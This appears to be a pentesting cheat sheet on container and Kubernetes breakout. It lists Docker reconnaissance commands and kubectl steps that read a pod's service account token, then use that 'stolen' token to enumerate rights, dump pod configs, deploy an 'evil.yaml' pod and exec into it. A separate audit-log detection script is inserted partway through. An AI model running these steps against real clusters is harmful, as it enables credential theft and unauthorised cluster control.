# Container/Sandbox Breakout

## Docker

I first check the **hosts** file for any signs of containerization and for other nodes on the network. You can also try running the **capsh** binary; if it exists, it prints the current container capabilities.

```
cat /etc/hosts #check for a container id like 8u9ru98432
capsh --print #check current Unix capabilities

ls -l /proc/*/ns #list the namespaces of each process

ls -al /dev/ | grep disk #check for disks
```

## Kubernetes

Try getting secrets.

```
cat /var/run/secrets/kubernetes.io/serviceaccount/token
```

List what you can do with this token:

```
kubectl --token "$(cat token.txt)" --insecure-skip-tls-verify --server=https://team.thm:6443 auth can-i --list
```

### Get pods & configs

```
kubectl get pods -o yaml \
	--server="https://kube-serv:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true > backup.config
```

```
kubectl get pods \
	--server="https://kube-serv:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true 
```

### Build & Deploy

```
kubectl apply -f ./evil.yaml \
	--server="https://kube-server:6443" \
	--token='<token you steal>' \
	--insecure-skip-tls-verify=true 
```

### Execute command

```
kubectl exec -it attacker \
	--server="https://kube-server:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true \
	-- bash
```
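On the defending side, the token use shown in the commands above leaves traces in the API server audit log. The following is an added example, not part of the original page: it flags service account identities that enumerate their permissions, drive the API with kubectl, or exec into pods. It assumes audit logging is enabled in JSON-lines format; the sample events and the function names are constructed for illustration.

```python
import json

# Constructed sample audit events (audit.k8s.io/v1 style JSON lines), not real logs.
SAMPLE_AUDIT_LOG = """\
{"verb":"create","user":{"username":"system:serviceaccount:default:web"},"sourceIPs":["203.0.113.7"],"userAgent":"kubectl/v1.28.0","objectRef":{"resource":"selfsubjectrulesreviews"}}
{"verb":"list","user":{"username":"system:serviceaccount:default:web"},"sourceIPs":["203.0.113.7"],"userAgent":"kubectl/v1.28.0","objectRef":{"resource":"pods","namespace":"default"}}
{"verb":"create","user":{"username":"system:serviceaccount:default:web"},"sourceIPs":["203.0.113.7"],"userAgent":"kubectl/v1.28.0","objectRef":{"resource":"pods","namespace":"default","name":"attacker","subresource":"exec"}}
{"verb":"list","user":{"username":"system:serviceaccount:kube-system:coredns"},"sourceIPs":["10.0.0.5"],"userAgent":"coredns/v1.11","objectRef":{"resource":"endpoints"}}
{"verb":"get","user":{"username":"alice"},"sourceIPs":["198.51.100.2"],"userAgent":"kubectl/v1.28.0","objectRef":{"resource":"pods","subresource":"exec"}}
"""

SA_PREFIX = "system:serviceaccount:"


def classify(event):
    """Return a reason string if the event looks like service account token misuse."""
    user = (event.get("user") or {}).get("username", "")
    if not user.startswith(SA_PREFIX):
        return None  # human users are out of scope for this check
    ref = event.get("objectRef") or {}
    resource, sub, verb = ref.get("resource"), ref.get("subresource"), event.get("verb")
    if resource == "selfsubjectrulesreviews" and verb == "create":
        return "permission enumeration (auth can-i --list)"
    if resource == "pods" and sub == "exec":
        return "exec into pod"
    # userAgent is client-controlled, so treat this as a hint, not proof.
    if event.get("userAgent", "").startswith("kubectl/"):
        return "kubectl used with a service account token"
    return None


def find_token_misuse(log_text):
    """Parse a JSON-lines audit log; return a list of (username, source_ip, reason)."""
    findings = []
    for line in log_text.splitlines():
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip blank, truncated or non-JSON lines
        reason = classify(event) if isinstance(event, dict) else None
        if reason:
            ips = event.get("sourceIPs") or ["?"]
            findings.append((event["user"]["username"], ips[0], reason))
    return findings


if __name__ == "__main__":
    for finding in find_token_misuse(SAMPLE_AUDIT_LOG):
        print(*finding, sep="  ")
```

Workloads rarely call the API with a kubectl user agent or create `selfsubjectrulesreviews`, so these rules tend to be low-noise; exec by service accounts may need an allowlist for CI or operator identities.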

### Basic commands

```bash
kubectl version #Get client and server version
kubectl get pod
kubectl get services
kubectl get deployment
kubectl get replicaset
kubectl get secret
kubectl get all
kubectl get ingress
kubectl get endpoints

#kubectl create deployment <deployment-name> --image=<docker image>
kubectl create deployment nginx-deployment --image=nginx
#Access the configuration of the deployment and modify it
#kubectl edit deployment <deployment-name>
kubectl edit deployment nginx-deployment
#Get the logs of the pod for debugging (the output of the docker container running)
#kubectl logs <replicaset-id/pod-id>
kubectl logs nginx-deployment-84cd76b964
#kubectl describe pod <pod-id>
kubectl describe pod mongo-depl-5fd6b7d4b4-kkt9q
#kubectl exec -it <pod-id> -- bash
kubectl exec -it mongo-depl-5fd6b7d4b4-kkt9q -- bash
#kubectl describe service <service-name>
kubectl describe service mongodb-service
#kubectl delete deployment <deployment-name>
kubectl delete deployment mongo-depl
#Deploy from config file
kubectl apply -f deployment.yml
```

<https://github.com/TurboWindX/kube-hunter>

<https://github.com/TurboWindX/peirates>

